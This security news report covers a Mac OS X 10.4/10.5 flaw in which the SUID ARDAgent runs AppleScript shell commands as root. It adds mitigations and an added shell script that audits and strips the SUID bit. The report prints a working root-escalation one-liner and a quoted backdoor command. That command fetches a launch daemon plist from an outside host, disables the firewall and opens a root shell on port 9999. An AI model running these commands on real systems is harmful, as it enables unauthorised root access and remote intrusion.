Root exploit for Mac OS X
A vulnerability in Mac OS X 10.4 and 10.5 makes it easy for potential attackers to obtain root rights to a system. The ARDAgent – Apple Remote Desktop – part of Remote Management has the SUID bit set. ARDAgent is able to run AppleScript with root rights and these, in turn, may contain shell commands – all without requiring a password.
To demonstrate the problem as a standard user or guest on a computer, type osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
into the console. Physical access to a system is not required for an attack to be successful. In principle, the exploit will also work remotely, say on a server on which a user has a restricted account with SSH access.
A suggestion of how this could be exploited to implement a backdoor has already been posted on Slashdot. When tested at heise Security, the line osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl "'
opened a root shell at TCP port 9999.
Several ways to solve the problem have now been suggested. The exploit doesn't work if the "Remote Management" option is enabled under Mac OS X 10.5 "System Settings/Sharing/" – but this is not the default setting. Neither does it work if the Apple Remote Desktop client has been installed and enabled under Mac OS X 10.4. Other suggestions are to completely remove Apple Remote Desktop, to compress the file, or to delete the SUID bit in ARDAgent:
chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
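An added example, not from the article: a small POSIX shell audit that checks whether a binary (by default the ARDAgent path named above) still carries the set-user-ID bit, applies the chmod u-s mitigation, and re-checks afterwards so that the fix is verified rather than assumed. The path constant and function names are the editor's own.

```shell
#!/bin/sh
# Constructed audit/remediation helper (not part of the heise article).
# Default target: the ARDAgent executable that ships with the SUID bit set.
ARDAGENT_DEFAULT="/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent"

# suid_status PATH
# Prints "vulnerable" if the SUID bit is set, "ok" if it is clear and
# "missing" if the path does not exist. Exit status is 0 only for "ok".
suid_status() {
    path="$1"
    if [ ! -e "$path" ]; then
        echo "missing"
        return 2
    fi
    if [ -u "$path" ]; then   # POSIX test -u: set-user-ID bit present
        echo "vulnerable"
        return 1
    fi
    echo "ok"
    return 0
}

# strip_suid PATH
# Applies the mitigation (chmod u-s) and confirms the bit is really gone;
# on a stock system this needs root, and a silent failure must not pass.
strip_suid() {
    path="$1"
    chmod u-s "$path" || return 1
    [ "$(suid_status "$path")" = "ok" ]
}

# audit_and_fix [PATH]
# Reports the state, remediates if needed and reports the result.
audit_and_fix() {
    path="${1:-$ARDAGENT_DEFAULT}"
    before=$(suid_status "$path")
    echo "$path: $before"
    if [ "$before" = "vulnerable" ]; then
        if strip_suid "$path"; then
            echo "$path: SUID bit removed"
        else
            echo "$path: chmod u-s failed (run as root?)" >&2
            return 1
        fi
    fi
}

# Usage: sh ardagent_suid_check.sh [PATH ...]; each argument is audited.
for p in "$@"; do audit_and_fix "$p"; done
```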
See also:
- Mac OS X Root Escalation Through AppleScript, thread on Slashdot
- Apple Remote Desktop Vulnerability Allows Malicious Programs to Execute Code as Root, report by Intego
(mba)